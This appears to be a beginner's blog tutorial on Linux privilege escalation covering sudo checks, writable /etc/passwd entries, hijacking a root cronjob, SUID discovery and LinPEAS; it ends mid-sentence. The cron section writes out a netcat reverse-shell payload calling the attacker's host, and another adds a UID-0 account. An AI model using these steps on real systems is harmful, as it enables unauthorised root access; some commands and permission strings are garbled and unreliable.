Privilege Escalation (Linux) — Part 1
Recently I started to study more in-depth about Privilege Escalation in Linux. This story will be a compilation of my notes, hopefully, explained well enough for anyone with little hacking background to understand.
As always, the first step is to explain what is Privilege Escalation. Then I will skim through some common steps before finally going into the details of some of these techniques. Because I’m still just a noob, my knowledge is very limited and there are hundreds more techniques I don’t know about.
What is Privilege Escalation?
Privilege Escalation is an attack that involves exploring some bug, misconfiguration, or design flaw in an operating system or an application to gain illicit access of elevated rights or privileges (root), beyond what is intended to the user.
There are two types of Privilege Escalation:
- Horizontal Privilege Escalation: involves gaining access to another account, human or machine, with similar privileges. Usually referred to as account takeover, this explores the lack of proper protection on said account. It’s important for an attacker because it increases the attack surface and maybe this account has access to something that has a vulnerability that allows vertical privilege escalation.
- Vertical Privilege Escalation: involves gaining access to an account that has increased privileges, for example, from a normal user gaining root rights. This can be complex because there may be needed several steps and conditions to bypass or override the controls.
Every account on a system has some form of privileged access. Therefore every account has a definition in the system of what it can and can’t do.
This is the basics of Privilege Escalation. Now I’ll show some of the most common PE vectors and some important points that should always be looked for.
0. Root
This is just informative and all that are reading this post should know what root is in Linux, but for those who don’t, root is the account that by default has access to all commands and files. This means that is the most privileged account in the system.
- Sudo
Sudo is software that allows a system admin to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. So, when a user wants to run some command with root permissions it usually does sudo command
The first thing a user should do when gaining access to a machine is precisely seeing what version of Sudo exists (if any) with the command sudo --version .
This is currently the latest version of sudo so it shouldn’t have any vulnerability, or better said, it shouldn’t have any *known* vulnerability.
A typical attack vector in privilege escalation is outdated programs, and in this case, there is a known exploit for sudo version ≤1.8.14 that allows any user to gain root access (CVE-2015–6502).
Still in Sudo, one should always run the command sudo -l where one can see which commands a user can use with privilege on the host. Still, to run said command as root the attacker must know the user password.
In this example, by running sudo -l we know that the user can run the command sudoedit on the file /home/*/*/test.sh as root.
2. Writable Sensitive Files
This happens when the user can write to /etc/passwd or /etc/shadow . These files are where in the system is saved all the users that have access to the system and the password hashes of the users, respectively.
The image above shows the correct permissions the file should have, he should only be writable by the root user. If any user could write in it, an attacker could create an entry that says that a certain user has root privileges.
Going a bit more in-depth how this happens, we first have to know a bit how that file is populated. This is a normal line on the file:
test:x:0:0:root:/root:/bin/bash
- test: is the username
- x: is the password. When it is an ‘x’ it means the password is encrypted on
/etc/shadow - 0: is the user ID. ‘0’ is reserved to root.
- 0: is the group ID
- root: is the user ID info
- /root: is the home directory of the user
- /bin/bash: is the absolute path of the shell this user uses.
Now for the Proof-of-Concept of the vulnerability. To remember, what we want to do is, if we can write to /etc/passwd , create a password hash, make an entry on the file with the hash we created on the password, login as that user with root access.
- Create password hash:
- Create an entry and put it on the file:
- Simply log in to user ch with root privileges. The password is pass123
3. Processes Running Automatically
Cronjobs are processes that the system runs automatically with a certain periodicity. Sometimes these run a certain bash file as root and that runs a certain set of commands as root too. If we identify a cronjob that runs a file that we can write too… You see where this is going.
To see what cronjobs are running simply run the command cat /etc/crontab . If this doesn’t return anything useful we can run a program called pspy64 (https://github.com/DominicBreuker/pspy) that shows us all the running processes in the system.
In this example, we found that a certain file (cleanall.sh) runs as root and we can write to it. So we try to make it run a netcat reverse shell to our machine and, if the connection is successful, we gain root access to the machine.
- On our machine we start a netcat listener:
nc -lnvp <port> - On our target we put in the previous file a connection to our listener:
echo "nc -e /bin/bash <our_ip> <port> > cleanall.sh. When this executes we have our root shell.
4. Abusing SUID/GUID
This is a bit more tricky, so there are some theoretical concepts that must be talked.
Everything in Linux is a file with permissions.
This file has all permissions and we can set this with the command chmod 777 . Why 777 you may ask, well it’s all about bits. If you think of these permissions as bits 7 is the combination of 4 (read), 2 (write) and 1 (execute). So chmod 600 corresponds to rw -— — and chmod 764 corresponds to rwx-rw-r.
A SUID is a type of user permission that users to execute a file with the permissions of a specific user. Those files which have SUID permissions run with higher privileges.
Well now that I did a terrible job explaining these SUID permissions, how do we find them? Well using the following command find / -perm -u=s -type f 2>/dev/null
Now each command that has a SUID has a different exploration method so I can’t possibly put them all here. But there are a lot of exploits on the amazing website https://gtfobins.github.io/.
5. LinPEAS
LinPEAS is a script that searches automatically for possible paths to escalate privileges. The objective is to download the script to the target machine, give it the rights permissions, and run it. We can obtain the script in https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS.
Well, this was a lot. I thought that I could put all, or almost, all my notes here but I was wrong. I had to divide them in two parts and, because I still didn’t write the second, I don’t know if I still have to create an extra t
